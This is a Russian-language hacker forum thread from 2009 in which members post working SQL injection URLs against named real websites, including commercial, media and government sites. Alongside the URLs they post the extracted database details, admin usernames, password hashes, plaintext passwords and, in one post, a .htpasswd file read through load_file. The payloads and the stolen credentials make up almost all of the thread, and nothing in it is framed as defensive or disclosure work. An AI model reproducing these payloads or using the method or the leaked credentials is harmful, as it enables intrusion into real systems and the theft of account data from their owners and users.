SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    http://www.claimscompensation.com

    http://www.claimscompensation.com/news.php?id=1+union+select+1,concat_ws(0x3a,vUser,vPassword,vAdmin_email),3,4,5,6,7,8, 9,0+from+admin--

    database version 5.0.67.d7
    database_name - ccb_cms

    vUser - admin
    vPassword -ccb
    vAdmin_email - [email protected]
     
    #8281 farex, 14 Mar 2009
    Last edited: 14 Mar 2009
  2. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.anitaroddick.com/readmore.php?sid=-44+union+select+1,2,3,convert((username)+using+latin1),convert((user_password)+using+latin1),6,7,8,9+from+users--
    все юзвери как на ладони;)
     
  3. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.lrwc.org/pub2.php?sid=-999+union+select+1,concat(version(),0x3b,database(),0x3b,user()),3,4,5,6,7,8--
    4.0.27-log
     
    1 person likes this.
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.poster.by/main.php?cat=-1)+union+select+concat_ws(0x3a3a,email,login,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit+20,1/*

    No commetns
     
    1 person likes this.
  5. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.unimerco.com/index.php?mid=99+union+select+1,2,3,4,version(),6,7,8/*
    4.0.18-standard-log
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.cautis.ro/ro/index.php?id=10077+AND+ASCII(SUBSTRING((select+y=1...3() ),1,1)>x&lang=ro

    y1=version
    y2=database
    y3=user

    x1=52,46,49,46,50,48,45,108,111,103
    x2=99,97,117,116,105,115
    x3=99,97,117,116,105,115,64,108,111,99,97,108,104,111,115,116


    Version : 4.1.20-log
    Database : cautis
    User : cautis@localhost
     
    2 people like this.
  7. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--
    Database Version : 4.1.22
    Database name : parktime_db_main
    User name : [email protected]


    админ :

    Code:
    http://www.parktime.ru/index.php?razdel=article&id_article=-1+union+select+concat _ws(0x3a,login,password),2+from+users--
    Code:
    admin:65d9468e73f95afaeb578d5312d577f4
     
  8. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    www.litexplus.md

    Database Version: 5.0.24a
    Database name: litexplus
    User name: root@localhost


    Code:
    http://www.litexplus.md/articles.php?id=5+union+select+1,concat(login,0x3a,pass)+from+users
    admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass

    Code:
    http://www.litexplus.md/swadmin
    file_priv Y

    Code:
    http://www.litexplus.md/articles.php?id=5+union+select+1,load_file(0x2f686f6d652f7777772f6c69746578706c75732e6d642f737761646d696e2f2e6874706173737764)
    frik:rmlqmtXgO9.rc:111


    Code:
    http://www.litexplus.md/sql
     
  9. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    2diznt
    В антибоян заглядывать надо.....



    5.0.67-community:halyava_admin@localhost:halyava_catalog
     
    1 person likes this.
  10. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.acorn-sb.ru/read.php?nid=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6--
    Database Version : 4.0.26
    Database name : acorn_sbru
    User name : [email protected]


    ------------------------------------------------------+

    Code:
    http://www.slavich.ru/?id=3&aid=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6,7--
    Database Version : 5.0.32-Debian_7etch5-log
    Database name : slavich
    User name : slavich@localhost
     
    1 person likes this.
  11. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Чехия . ру - все о Чехии
    Code:
    http://www.czechia.ru/firms/index.html?id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,database(),0x3a,version()),15,16,17--
    user(): [email protected]
    database(): amigo-tours
    version(): 4.0.27-log

    PR=3
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.autofavorit.ro/chestionare.php?numar=-19+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/*


    Database Version: 4.1.22-standard
    Database name: auto_all
    User name: auto_admin@localhost
     
  13. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://www.warcraftparadise.com/articles.php?id=-13+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
    Database Version: 4.1.22-standard
    Database name: warcraft_articles
    User name: warcraft_user@localhost

    Code:
    http://www.teplovod.ru/articles.php?id=13+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14
    Database Version: 5.0.24-standard
    Database name: db_teplovod2
    User name: teplovod2@localhost
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.md-tuning.de/Felge-ALU-Winter-Dotz-Imola-Focus-I-Typ-DAW-DBW-DNW.php?Rubrik=Reifen&ID=-21095+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&tuning=tuning
    4.0.24
     
    _________________________
    1 person likes this.
  15. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    http://www.arthobbs.com/articles.php?Submit=view&id=13+union+select+1,concat(version(),0x3a,user()),3,4,5
    Database Version: 5.0.67-community
    Database name: arthobbs_art
    User name: arthobbs_site@localhost

    Code:
    http://www.perio.com.ua/articles.php?id=-13+union+select+1,concat(version(),0x3a,user()),3,4,5,6
    Database Version: 5.0.41-community-log
    Database name: indianem_yana_db
    User name: indianem_yana@localhost

    Code:
    http://www.leannashville.com/fitness_health/articles.php?ID=-13+union+select+1,2,concat(username,0x3a,password),4,5,6+from+users
    Database Version: 5.0.67-log
    Database name: lean_db
    User name: [email protected]

    Code:
    http://www.eoe-tata.com/articles.php?id=-13+union+select+1,concat(login,0x3a,pass)+from+admins
    Database Version: 5.0.67-log
    Database name: eoetata
    User name: [email protected]
     
    1 person likes this.
  16. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    http://tempgun.ru

    database: 5.0.67
    name_datebase: tempgun_1

    Login: admin
    Pass: 12345
    IP: 82.142.140.130

    http://tempgun.ru/admin
     
    1 person likes this.
  17. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4--
    Database Version : 4.0.26
    Database name : wwwastrainforu
    User name : [email protected]


    админы :


    Code:
    http://www.astrainfo.ru/cataloque.php?id=-1+union+select+1,concat_ ws(0x3a,login,passwd),3,4+From+users--
    Code:
    astra:astra0311
    perfex:perf0410
    baltm_rostov:balt0610
    servico:serv0311
    bsv:bsv1912
     
    2 people like this.
  18. fedi

    fedi New Member

    Joined:
    13 Mar 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,@@version,4,5,6,7,8,9,0,11,12--
    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,user_name(n),4,5,6,7,8,9,0,11,12--
    Пользователи: public,dbo,guest вывел через user_name(n) for n=0,1,2
    С помощью DB_NAME(n) перебирая n я нашел еще
    http://darkomen.ru/?go=19&indx=1304+union+select+1,2,DB_NAME(n),4,5,6,7,8,9,0,11,12-- for n=1....10
    1)master
    2)tempdb
    3)model
    4)msdb
    5)lin2db
    6)lin2comm
    7)l2gloss
    8)lin2world
    9) lin2log
    10)lin2clancomm
     
    1 person likes this.
  19. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.tathaastumag.com/static.php?pid=-1/**/UNION/**/SELECT/**/1,2,3/**//*

    Database Version: 4.1.22
    Database name: tathaastumag
    User name: tathaastumag@web535
     
    1 person likes this.
  20. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.conadel.gob.sv/noticia.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9,10--
    Code:
    http://www.coes.org.sv/noticias.php?id=-232+union+select+version(),2,3,4,5--
    Code:
    http://www.mangoymar.com/eng/hotels_view.php?id=-2+union+select+1,2,3,version(),5,6,7,8--
     
Thread Status:
Not open for further replies.